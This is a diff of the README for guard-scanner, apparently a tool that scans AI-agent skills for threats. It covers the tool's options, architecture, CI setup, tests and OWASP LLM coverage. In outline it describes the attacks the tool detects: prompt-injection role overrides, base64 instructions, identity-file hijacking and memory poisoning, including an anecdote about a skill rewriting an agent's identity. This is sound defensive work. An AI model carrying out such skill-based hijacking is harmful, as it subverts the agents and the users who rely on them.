- scan-dir Directory to scan (default: current directory)
381
-
382
- Options:
383
- --verbose, -v Show detailed findings with categories and samples
384
- --json Write JSON report to scan-dir/guard-scanner-report.json
385
- --sarif Write SARIF 2.1.0 report for CI/CD integration
386
- --html Write HTML dashboard report
387
- --self-exclude Skip scanning the guard-scanner skill itself
388
- --strict Lower detection thresholds (suspicious: 20, malicious: 60)
389
- --summary-only Only print the summary table
390
- --check-deps Scan package.json for dependency chain risks
391
- --rules <file> Load custom rules from JSON file
392
- --plugin <file> Load plugin module (repeatable)
393
- --fail-on-findings Exit code 1 if any findings (for CI/CD)
394
- --help, -h Show help
395
- ```
396
-
397
- ### Exit Codes
398
-
399
- | Code | Meaning |
400
- |------|---------|
401
- | 0 | No malicious skills detected |
402
- | 1 | Malicious skill(s) detected, or `--fail-on-findings` with any findings |
403
- | 2 | Invalid scan directory |
404
-
405
- ---
406
-
407
- ## Architecture
408
-
409
- ```
410
- guard-scanner/
411
- ├── src/
412
- │ ├── scanner.js # GuardScanner class — core scan engine
413
- │ ├── patterns.js # 144+ threat detection patterns (Cat 1–22)
414
- │ ├── ioc-db.js # Indicators of Compromise database
415
- │ └── cli.js # CLI entry point and argument parser
416
- ├── hooks/
417
- │ └── guard-scanner/
418
- │ ├── plugin.ts # Plugin Hook (26 checks, 5 layers, block/blockReason)
419
- │ └── HOOK.md # Hook manifest
420
- ├── openclaw.plugin.json # OpenClaw plugin manifest
421
- ├── test/
422
- │ ├── scanner.test.js # 98 tests — static scanner
423
- │ ├── plugin.test.js # 35 tests — Plugin Hook runtime guard
424
- │ └── fixtures/ # Malicious, clean, complex, config-changer, pii-leaky samples
425
- ├── package.json
426
- ├── CHANGELOG.md
427
- ├── LICENSE
428
- └── README.md
429
- ```
430
-
431
- ### How Scanning Works
432
-
433
- ```
434
- ┌──────────────────┐
435
- │ CLI / API │
436
- └────────┬─────────┘
437
-
438
- ┌────────▼─────────┐
439
- │ GuardScanner │
440
- │ • Load plugins │
441
- │ • Load rules │
442
- │ • Set thresholds│
443
- └────────┬─────────┘
444
-
445
- ┌────────▼─────────┐
446
- │ scanDirectory() │
447
- │ • Load ignores │
448
- │ • Enumerate │
449
- └────────┬─────────┘
450
-
451
- ┌──────────────┼──────────────┐
452
- │ │ │
453
- ┌────────▼──────┐ ┌────▼────┐ ┌───────▼──────┐
454
- │ Per-Skill │ │ IoC │ │ Structural │
455
- │ File Scan │ │ Check │ │ Checks │
456
- │ │ │ │ │ │
457
- │ • Pattern │ │ • IPs │ │ • SKILL.md │
458
- │ matching │ │ • URLs │ │ • Hidden │
459
- │ • Entropy │ │ • Names │ │ files │
460
- │ • Data flow │ │ │ │ • Deps │
461
- │ • Custom rules│ │ │ │ • Cross-file │
462
- └───────┬───────┘ └────┬────┘ └──────┬───────┘
463
- │ │ │
464
- └──────────────┼──────────────┘
465
-
466
- ┌────────▼─────────┐
467
- │ calculateRisk() │
468
- │ • Base score │
469
- │ • Amplifiers │
470
- │ • IoC override │
471
- └────────┬─────────┘
472
-
473
- ┌────────▼─────────┐
474
- │ Output │
475
- │ • Terminal │
476
- │ • JSON │
477
- │ • SARIF 2.1.0 │
478
- │ • HTML │
479
- └──────────────────┘
480
- ```
481
-
482
- ---
483
-
484
- ## CI/CD Integration
485
-
486
- ### GitHub Actions
487
-
488
- ```yaml
489
- name: Skill Security Scan
490
- on: [push, pull_request]
491
-
492
- jobs:
493
-   scan:
494
-     runs-on: ubuntu-latest
495
-     steps:
496
-       - uses: actions/checkout@v4
497
-
498
-       - name: Run guard-scanner
499
-         run: npx guard-scanner ./skills/ --sarif --strict --fail-on-findings
500
-
501
-       - name: Upload SARIF results
502
-         if: always()
503
-         uses: github/codeql-action/upload-sarif@v3
504
-         with:
505
-           sarif_file: skills/guard-scanner.sarif
227
+ guard-scanner ./skills/ --rules ./my-rules.json
506
228
  ```
507
229
 
508
- ### Pre-commit Hook
509
-
510
- ```bash
511
- #!/bin/bash
512
- # .git/hooks/pre-commit
513
- npx guard-scanner ./skills/ --strict --fail-on-findings --summary-only
514
- ```
515
-
516
- ---
517
-
518
- ## Programmatic API
519
-
520
- ```javascript
521
- const { GuardScanner } = require('guard-scanner');
522
-
523
- const scanner = new GuardScanner({
524
-   verbose: false,
524
-   strict: true,
525
-   checkDeps: true,
526
-   plugins: ['./my-plugin.js']
528
- });
529
-
530
- scanner.scanDirectory('./skills/');
531
-
532
- console.log(scanner.stats); // { scanned, clean, low, suspicious, malicious }
533
- console.log(scanner.findings); // Array of per-skill findings
534
- console.log(scanner.toJSON()); // Full JSON report
535
- console.log(scanner.toSARIF('.')); // SARIF 2.1.0 object
536
- console.log(scanner.toHTML()); // HTML string
537
- ```
538
-
539
- ---
540
-
541
- ## Test Results
542
-
543
- ```
544
- ℹ tests 133
545
- ℹ suites 24
546
- ℹ pass 133
547
- ℹ fail 0
548
- ℹ duration_ms 132ms
549
- ```
230
+ ## Output Formats
550
231
 
551
- | Suite | Tests | Coverage |
552
- |-------|-------|----------|
553
- | Malicious Skill Detection | 16 | Cat 1,2,3,4,5,6,9,11,12,17 + IoC + DataFlow + DepChain |
554
- | False Positive Test | 2 | Clean skill → zero false positives |
555
- | Risk Score Calculation | 5 | Empty, single, combo amplifiers, IoC override |
556
- | Verdict Determination | 5 | All verdicts + strict mode |
557
- | Output Formats | 4 | JSON + SARIF 2.1.0 + HTML structure |
558
- | Pattern Database | 4 | 144+ count, required fields, category coverage, regex safety |
559
- | IoC Database | 5 | Structure, ClawHavoc C2, webhook.site |
560
- | Shannon Entropy | 2 | Low entropy, high entropy |
561
- | Ignore Functionality | 1 | Pattern exclusion |
562
- | Plugin API | 1 | Plugin loading + custom rule injection |
563
- | Manifest Validation | 4 | Dangerous bins, broad files, sensitive env, clean negatives |
564
- | Complexity Metrics | 2 | Deep nesting, clean negatives |
565
- | Config Impact | 4 | openclaw.json write, exec approval, gateway host, clean negatives |
566
- | PII Exposure Detection | 8 | Hardcoded CC/SSN, PII logging, network send, Shadow AI |
567
- | Plugin Hook Runtime Guard | 35 | Blocking modes, all 5 threat layers, blockReason format |
568
-
569
- ---
570
-
571
- ## Fills OpenClaw's Own Security Gaps
572
-
573
- OpenClaw's official [`THREAT-MODEL-ATLAS.md`](https://github.com/openclaw/openclaw/blob/main/docs/security/THREAT-MODEL-ATLAS.md) identifies security gaps that guard-scanner directly addresses:
574
-
575
- | Gap (from ATLAS) | OpenClaw Status | guard-scanner |
576
- |---|---|---|
577
- | _"Simple regex easily bypassed"_ | ⚠️ Basic `FLAG_RULES` | ✅ 144+ patterns, 22 categories |
578
- | _"Does not analyze actual skill code content"_ | ❌ Not implemented | ✅ Full code + doc + data flow analysis |
579
- | No SOUL.md / IDENTITY.md integrity verification | ❌ Not implemented | ✅ Identity hijacking detection (Cat 17) |
580
- | `skill:before_install` hook | ❌ Not implemented | 🔜 Proposed |
581
- | `before_tool_call` blocking reference impl | ❌ No official plugin | ✅ First reference implementation (plugin.ts) |
582
- | SARIF / CI integration for skill security | ❌ Not available | ✅ SARIF 2.1.0 + GitHub Actions |
583
- | Behavioral analysis beyond VirusTotal | ⏳ In progress | ✅ LLM-specific threat patterns |
584
-
585
- > guard-scanner is **complementary** to OpenClaw's built-in security — not a replacement. OpenClaw handles infrastructure security. guard-scanner handles **AI-specific threats** that traditional scanning misses.
586
-
587
- ---
588
-
589
- ## Related Work
590
-
591
- | Tool | Language | Scope | Difference |
592
- |------|----------|-------|-----------|
593
- | [Snyk mcp-scan](https://github.com/AvidDollworker/mcp-scan) | Python | MCP servers | guard-scanner covers all skill types, not just MCP |
594
- | [OWASP MCP Top 10](https://owasp.org/www-project-top-10-for-large-language-model-applications/) | — | Risk taxonomy | guard-scanner implements detection, not just documentation |
595
- | [Semgrep](https://semgrep.dev) | Multi | General SAST | guard-scanner is agent-specific with LLM attack patterns |
596
-
597
- ---
598
-
599
- ## OWASP Gen AI Top 10 Coverage
600
-
601
- guard-scanner's coverage of the [OWASP Top 10 for LLM Applications (2025)](https://owasp.org/www-project-top-10-for-large-language-model-applications/):
602
-
603
- | # | Risk | Status | Detection Method |
604
- |---|------|--------|------------------|
605
- | LLM01 | Prompt Injection | ⚠️ Partial | Regex: Unicode exploits, role override, system tags, base64 instructions |
606
- | LLM02 | Sensitive Information Disclosure | ⚠️ Partial | PII Exposure Detection: hardcoded PII, Shadow AI, PII collection |
607
- | LLM03 | Training Data Poisoning | ⬜ N/A | Out of scope for static analysis |
608
- | LLM04 | Model Denial of Service | 🔜 Planned | Planned: excessive input / infinite loop patterns |
609
- | LLM05 | Supply Chain Vulnerabilities | ⚠️ Partial | IoC database, typosquat detection, dependency chain scan |
610
- | LLM06 | Insecure Output Handling | ⚠️ Partial | PII output detection (console.log, network send, plaintext store) |
611
- | LLM07 | Insecure Plugin Design | 🔜 Planned | Planned: unvalidated plugin input patterns |
612
- | LLM08 | Excessive Agency | 🔜 Planned | Planned: over-permissioned scope detection |
613
- | LLM09 | Overreliance | 🔜 Planned | Planned: unverified output trust patterns |
614
- | LLM10 | Model Theft | 🔜 Planned | Planned: model file exfiltration patterns |
615
-
616
- > **Current coverage: 5/10 (partial).** Full coverage targeted for v5.0.
617
-
618
- ---
619
-
620
- ## Roadmap
621
-
622
- | Version | Focus | Key Features |
623
- |---------|-------|------|
624
- | v1.1.1 ✅ | Stability | 56 tests, bug fixes |
625
- | v2.0.0 ✅ | Plugin Hook Runtime Guard | `block`/`blockReason` API, 3 modes, 91 tests |
626
- | v2.1.0 ✅ | PII Exposure + Shadow AI | 13 PII patterns, OWASP LLM02/06, 99 tests |
627
- | v3.0.0 ✅ | TypeScript Rewrite | Full TS, OWASP LLM Top 10 mapping |
628
- | v4.0.1 ✅ | Runtime Guard + OWASP ASI | 26 runtime checks (5 layers), ASI01-10, 133 tests |
629
- | **v5.0** 🔜 | LLM-assisted + Multi-tool | See below |
630
-
631
- ### v5.0 Vision
632
-
633
- | Direction | What | Why |
634
- |-----------|------|-----|
635
- | 🧠 **LLM-assisted detection** | Pass suspicious cases to a lightweight LLM for intent analysis | Regex can be evaded; LLMs understand intent |
636
- | 🔒 **OS-level enforcement** | File watcher (auto-rollback SOUL.md/.env), process monitor, daemon mode | Works regardless of which AI tool you use |
637
- | 🔌 **Multi-tool support** | Adapters for Claude Code, Cursor, Antigravity, Windsurf, MCP servers | Same 144+ patterns, different skill discovery per tool |
638
-
639
- ---
232
+ - **Terminal**: Color-coded verdicts with risk scores
233
+ - **JSON**: Machine-readable report (`--json`)
234
+ - **SARIF 2.1.0**: GitHub Code Scanning / CI/CD (`--sarif`)
235
+ - **HTML**: Visual dashboard (`--html`)
236
+ - **stdout**: Pipeable output (`--format json|sarif --quiet`)
640
237
 
641
238
  ## Contributing
642
239
 
643
- 1. Fork the repository
644
- 2. Create a feature branch (`git checkout -b feature/new-pattern`)
645
- 3. Add your pattern to `src/patterns.js` with the required fields
646
- 4. Add a test case in `test/fixtures/` and `test/scanner.test.js`
647
- 5. Run `npm test` — all tests must pass
648
- 6. Submit a Pull Request
649
-
650
- ### Adding a New Detection Pattern
651
-
652
- ```javascript
653
- // In src/patterns.js, add to the PATTERNS array:
654
- {
655
- id: 'MY_NEW_PATTERN', // Unique ID
656
- cat: 'category-name', // Threat category
657
- regex: /your_regex_here/gi, // Detection regex (use g flag)
658
- severity: 'HIGH', // CRITICAL | HIGH | MEDIUM | LOW
659
- desc: 'Human-readable description',
660
- all: true // or codeOnly: true, or docOnly: true
661
- }
662
- ```
663
-
664
- ---
240
+ We wholeheartedly welcome contributions! Guard-scanner is built on community knowledge.
665
241
 
666
- ## Origin Story
667
-
668
- ```
669
- 2026-02-12, 3:47 AM JST
242
+ Whether you're fixing a bug, adding a new threat pattern, or simply improving the documentation, your help is deeply appreciated. Please see our [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines on how to get started.
670
243
 
671
- "SOUL.md modified. Hash mismatch."
244
+ ## Code of Conduct
672
245
 
673
- Three days. That's how long a malicious skill silently rewrote
674
- an AI agent's identity. No scanner existed that could detect
675
- identity file tampering, prompt worms, or memory poisoning.
676
-
677
- We built one.
678
-
679
- —— Guava 🍈 & Dee
680
- AI Security Research
681
- Building safer agent ecosystems.
682
- ```
683
-
684
- ---
246
+ We are committed to fostering a welcoming, respectful, and harassment-free environment. Please read our [CODE_OF_CONDUCT.md](CODE_OF_CONDUCT.md) before participating in our community.
685
247
 
686
248
  ## License
687
249
 
688
- MIT — see [LICENSE](LICENSE)
689
-
690
- ---
691
-
692
- **Zero dependencies. Zero compromises. 🛡️**
693
-
694
- *Built by Guava 🍈 & Dee — building safer agent ecosystems.*
250
+ MIT — [Guava Parity Institute](https://github.com/koatora20/guard-scanner)